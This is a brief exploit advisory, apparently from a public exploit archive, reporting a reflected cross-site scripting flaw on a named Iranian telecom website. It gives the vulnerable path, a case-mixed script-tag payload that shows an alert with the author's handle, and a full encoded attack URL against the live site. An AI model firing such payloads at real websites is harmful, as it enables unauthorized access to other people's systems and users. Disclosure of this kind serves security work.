-----------------------------------------------------------------------------------

Exploit Title : 118 Telecom's website of Iran XSS Vulnerability

Exploit Author : 4TT4CK3R

HomePage : http://118.tct.ir

Tested on : Windows , Firefox

Discovered by : 4TT4CK3R

Category : WebApp

Date : 2016/01/22

-----------------------------------------------------------------------------------


Vulnerable Directory :
http://118.tct.ir/exe/

Add this script at the end of Vulnerable directory :

<ScrIpT>alert(String.fromCharCode(52, 84, 84, 52, 67, 75, 51, 82))</ScRipT>


This Code "String.fromCharCode(52, 84, 84, 52, 67, 75, 51, 82)" is a CharCode
that is 4TT4CK3R for testig !!


Our Target is :
http://118.tct.ir/exe/%3CScrIpT%3Ealert%28String.fromCharCode%2852,%2084,%2084,%2052,%2067,%2075,%2051,%2082%29%29%3C/ScRipT%3E



-----------------------------------------------------------------------------------

-->> My enemies are ridiculous men
-->> We LovE IraN

-----------------------------------------------------------------------------------